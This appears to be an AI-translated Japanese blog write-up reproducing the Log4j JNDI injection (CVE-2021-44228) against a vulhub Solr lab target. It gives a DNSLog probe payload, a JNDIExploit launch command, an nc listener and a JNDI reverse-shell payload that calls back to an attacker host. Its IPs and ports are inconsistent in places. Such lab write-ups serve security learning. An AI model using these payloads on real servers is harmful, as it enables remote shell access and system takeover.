Log4Jの逆シリアル化

2024年2月13日#Web2Security15

AI 翻訳

この記事はAIを通じて英語から日本語に翻訳されました。原文を表示

AI が生成した要約

在Kali系统中，使用nc命令监听端口信息作为攻击机。靶机IP为192.168.1.4:8983，本机IP为192.168.1.2，攻击机为192.168.91.131。通过打开靶机环境的image.png请求一个DNS域名http://dnslog.cn/image.png，并将域名改为gswq4u.dnslog.cn。然后在hackbar中点击loadURLimage.png，并将提供的地址复制为image.png。接着在靶机环境中执行命令，出现页面image.png。使用JNDIExploit-1.2输入指令java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本机IPimage.png。在攻击机上打开端口监听命令nc -lvp 4444。在hackbar中构建命令并点击Executeimage.png，发现监听的端口返回了shellimage.png。这样完成了复现。

環境：
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali システム：攻撃マシンとしてポート情報をリッスンするために nc が必要です
ローカルマシン：中継マシン
CentOS：ターゲットマシン

アドレス情報：
ターゲットマシン IP：192.168.1.4:8983
ローカルマシン IP：192.168.1.2
攻撃マシン：192.168.91.131

ターゲットマシン環境を開始します

DNS ドメインをリクエストします
http://dnslog.cn/

ドメイン：
gswq4u.dnslog.cn
Hackbar を開き、まず loadURL をクリックします

提供されたアドレスをコピーします

後ろのドメインを、先ほど申請したものに変更します
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
実行をクリックすると、以下のページが表示されます

ここでフィードバックを受け取ります

今、JNDIExploit-1.2 を開きます
コマンドを入力します
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i ローカルマシン IP

その後、攻撃マシンでポートをリッスンします
コマンド：
nc -lvp 4444

Hackbar で以下のコマンドを構築します
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
Execute をクリックします

リッスンポートからシェルが返されることがわかります

これで再現が完了しました